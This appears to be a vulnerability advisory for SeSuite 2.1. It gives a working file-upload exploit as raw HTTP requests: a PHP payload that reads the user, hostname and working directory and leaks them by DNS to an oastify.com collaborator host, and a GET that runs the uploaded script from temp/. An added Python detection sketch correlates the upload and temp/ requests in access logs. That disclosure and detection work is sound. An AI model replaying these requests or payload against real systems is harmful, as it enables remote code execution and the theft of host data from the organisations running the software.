SeSuite Version 2.1 is vulnerable to command execution via the upload of a malicious file at the form/efms_exec_html/file_upload_parser.php endpoint.
- Malicious file upload
POST /se/v54285/form/efms_exec_html/file_upload_parser.php HTTP/2
Host: localhost
Cookie: se-authentication-token=7dd277d81ca7b14db919a1c1e46c18dc36f7; mode=deploy
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------239428381620151611771983433321
Content-Length: 471
Origin: https://localhost
Referer: https://localhost/se/v54285/form/efms_exec_html/form_application.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Dnt: 1
Sec-Gpc: 1
Te: trailers

-----------------------------239428381620151611771983433321
Content-Disposition: form-data; name="file"; filename="obfuscated-phpshell.php"
Content-Type: text/php

<?php
$user = get_current_user();
$hostname = gethostname();
$workdir = getcwd();
$payload = $user.'--'.$hostname.'--'.$workdir.'';
$ip = gethostbyname($payload.'zy1f30ifecn9cmiesll5d0e0grmoad.oastify.com');
echo $ip;
?>
-----------------------------239428381620151611771983433321--

GET /se/v54285/temp/6fed24b7.php HTTP/2
Host: localhost
Cookie: se-authentication-token=7dd277d81ca7b14db919a1c1e46c18dc36f7; mode=deploy
User-Agent: pwnbyte
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://localhost/se/v54285/form/efms_exec_html/form_application.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Dnt: 1
Sec-Gpc: 1
Te: trailers
Content-Length: 0
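
A detection sketch for the request pair shown above: a POST to file_upload_parser.php followed by a request for a script under temp/ from the same client. This is an added example, not part of the original advisory; the combined access-log format, the 10-minute window, the script-extension list and the sample log lines are assumptions.

```python
import re
from datetime import datetime, timedelta

# Common/combined access-log prefix: client, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_RE = re.compile(r'/form/efms_exec_html/file_upload_parser\.php$')
# Script extensions requested from a temp/ directory (extension list is an assumption).
TEMP_SCRIPT_RE = re.compile(r'/temp/[^/]+\.(?:php\d?|phtml|phar)$', re.I)
WINDOW = timedelta(minutes=10)  # assumed correlation window


def find_upload_then_exec(lines, window=WINDOW):
    """Return (ip, upload_time, script_path, status) for each temp/ script
    request that follows an upload POST from the same client within `window`."""
    last_upload = {}  # client ip -> time of most recent upload POST
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ts = datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z')
        path = m['path'].split('?', 1)[0]  # ignore any query string
        if m['method'] == 'POST' and UPLOAD_RE.search(path):
            last_upload[m['ip']] = ts
        elif TEMP_SCRIPT_RE.search(path):
            up = last_upload.get(m['ip'])
            if up is not None and timedelta(0) <= ts - up <= window:
                hits.append((m['ip'], up, path, int(m['status'])))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Jan/2023:10:00:01 +0000] "POST /se/v54285/form/efms_exec_html/file_upload_parser.php HTTP/2.0" 200 31',
    '198.51.100.7 - - [12/Jan/2023:10:00:09 +0000] "GET /se/v54285/temp/6fed24b7.php HTTP/2.0" 200 12',
    '203.0.113.20 - - [12/Jan/2023:10:01:00 +0000] "POST /se/v54285/form/efms_exec_html/file_upload_parser.php HTTP/2.0" 200 31',
    '203.0.113.20 - - [12/Jan/2023:10:01:05 +0000] "GET /se/v54285/temp/a81c22f0.pdf HTTP/2.0" 200 48213',
    '192.0.2.44 - - [12/Jan/2023:10:02:00 +0000] "GET /se/v54285/temp/6fed24b7.php HTTP/2.0" 404 0',
]

if __name__ == '__main__':
    for ip, up, path, status in find_upload_then_exec(SAMPLE_LOG):
        print(f'{ip} uploaded at {up.isoformat()} then requested {path} ({status})')
```

Correlating on client IP is a simplification; a request for any script file under temp/ that returns 200 is worth alerting on by itself, since an upload directory has no reason to serve executable content.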